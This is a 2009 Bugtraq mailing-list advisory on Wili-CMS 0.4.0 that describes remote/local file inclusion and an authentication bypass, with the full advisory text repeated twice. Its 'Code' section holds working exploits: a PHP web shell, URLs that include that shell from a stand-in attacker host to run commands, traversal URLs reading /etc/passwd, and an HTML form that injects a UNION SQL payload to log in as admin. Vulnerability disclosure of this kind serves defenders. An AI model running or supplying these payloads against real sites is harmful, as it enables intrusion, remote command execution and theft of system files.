Wili-CMS 0.4.0 Multiple Vulnerabilities (Remote/Local File Inclusion - Authentication Bypass)
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: Wili-CMS 0.4.0 Multiple Vulnerabilities (Remote/Local File Inclusion - Authentication Bypass)
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Fri, 6 Mar 2009 13:05:06 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=VFIHcw0+w5b46RLA9zMz8K2IaRaTqbz4qwB7E7yx/qk=; b=WaWoLlIwwghkaobEUhBOjgshgf9EsZfD7kieYlpJ8sWIXrDLQVYkHkvnnPAgcV7Clw FCtJWkeRK2FN3wcoDWFdhe//xvWZQB5bkT3KEvH1NzbioymOl5BsuZU5skKbcc94Icnn ztmOWlpsZC7I3r+QwNUKcwow+OVvDgnGA3Mxo=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=R6qkzkGQzm37JkCznsMFnyW3hI4is9iosfTxWPEuV4rfBD9jej6ltyvnY7x6JQ6vUe OZ5k8i/jKlh8wV2zR5Xg2Pw0pNw4106zQx8Q0/laQhyfGKiZEJSWR0PZLpV8u+hPBrQU 5yQxolVQs/V3iZmqcmGeB6RMxk+qzJFqNTkvk=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
[+] Application: Wili-CMS
[+] Version: 0.4.0
[+] Website: http://wili-cms.sourceforge.net/
[+] Bugs: [A] Multiple Remote/Local File Inclusion
[B] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 06 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple Remote/Local File Inclusion
[-] Requisites: none
[-] File affected: index.php
This bug allows a guest to include remote and
local files and however to exec remote commands.
...
if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}
...
include( template_file( $globals['root_template'] ) );
- [B] Authentication Bypass
[-] Requisites: magic_quotes_gpc = off
[-] File affected: lib/admin/init_session.php
This bug allows a guest to login as admin.
...
$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password']
: $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];
...
$sth = mysql_query(
"SELECT id
FROM ".$globals['userstable']."
WHERE username='".$_SESSION['uname']."'
AND adminflag=1
AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );
// password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);
if ( $globals['admin_modus'] == "loggedin" ) {
// log login
db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
// goto welcome page if skipwelcome flag of this user is not set
if ( !(mysql_result( $userh, 0, 1 )) ) {
$_REQUEST['npage'] = get_firstpage( "adminwelcome" );
}
$globals['admin_modus'] = "";
}
...
*************************************************
[+] Code
- [A] Multiple Remote/Local File Inclusion
shell.txt: <?php system($_GET['cmd']); ?>
http://www.site.com/path/?npage=-1&content_dir=http://www.evilsite.com/shell.txt%00&cmd=ls
http://www.site.com/path/?npage=1&content_dir=http://www.evilsite.com/shell.txt%00&cmd=ls
http://www.site.com/path/?npage=-1&content_dir=../../../../etc/passwd%00
http://www.site.com/path/?npage=1&content_dir=../../../../etc/passwd%00
- [B] Authentication Bypass
<html>
<head>
<title>Wili-CMS 0.4.0 Authentication Bypass Exploit</title>
</head>
<body>
<form action="http://www.site.com/path/admin.php" method="POST">
<input type="text" name="uname" value="admin">
<input type="hidden" name="password" value="1') UNION ALL SELECT 1#">
<input type="hidden" name="mode" value="loggedin">
<input type="hidden" name="npage" value="1">
<input type="submit" value="Exploit">
</form>
</body>
</html>
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
******* Salvatore "drosophila" Fresta *******
[+] Application: Wili-CMS
[+] Version: 0.4.0
[+] Website: http://wili-cms.sourceforge.net/
[+] Bugs: [A] Multiple Remote/Local File Inclusion
[B] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 06 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple Remote/Local File Inclusion
[-] Requisites: none
[-] File affected: index.php
This bug allows a guest to include remote and
local files and however to exec remote commands.
...
if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}
...
include( template_file( $globals['root_template'] ) );
- [B] Authentication Bypass
[-] Requisites: magic_quotes_gpc = off
[-] File affected: lib/admin/init_session.php
This bug allows a guest to login as admin.
...
$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password'] :
$_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ?
$_REQUEST['uname'] : $_SESSION['uname'];
...
$sth = mysql_query(
"SELECT id
FROM ".$globals['userstable']."
WHERE username='".$_SESSION['uname']."'
AND adminflag=1
AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );
// password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);
if ( $globals['admin_modus'] == "loggedin" ) {
// log login
db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
// goto welcome page if skipwelcome flag of this user is not set
if ( !(mysql_result( $userh, 0, 1 )) ) {
$_REQUEST['npage'] = get_firstpage( "adminwelcome" );
}
$globals['admin_modus'] = "";
}
...
*************************************************
[+] Code
- [A] Multiple Remote/Local File Inclusion
shell.txt: <?php system($_GET['cmd']); ?>
http://www.site.com/path/?npage=-1&content_dir=http://www.evilsite.com/shell.txt%00&cmd=ls
http://www.site.com/path/?npage=1&content_dir=http://www.evilsite.com/shell.txt%00&cmd=ls
http://www.site.com/path/?npage=-1&content_dir=../../../../etc/passwd%00
http://www.site.com/path/?npage=1&content_dir=../../../../etc/passwd%00
- [B] Authentication Bypass
<html>
<head>
<title>Wili-CMS 0.4.0 Authentication Bypass Exploit</title>
</head>
<body>
<form action="http://www.site.com/path/admin.php" method="POST">
<input type="text" name="uname" value="admin">
<input type="hidden" name="password" value="1') UNION ALL SELECT 1#">
<input type="hidden" name="mode" value="loggedin">
<input type="hidden" name="npage" value="1">
<input type="submit" value="Exploit">
</form>
</body>
</html>
*************************************************
[+] Fix
No fix.
*************************************************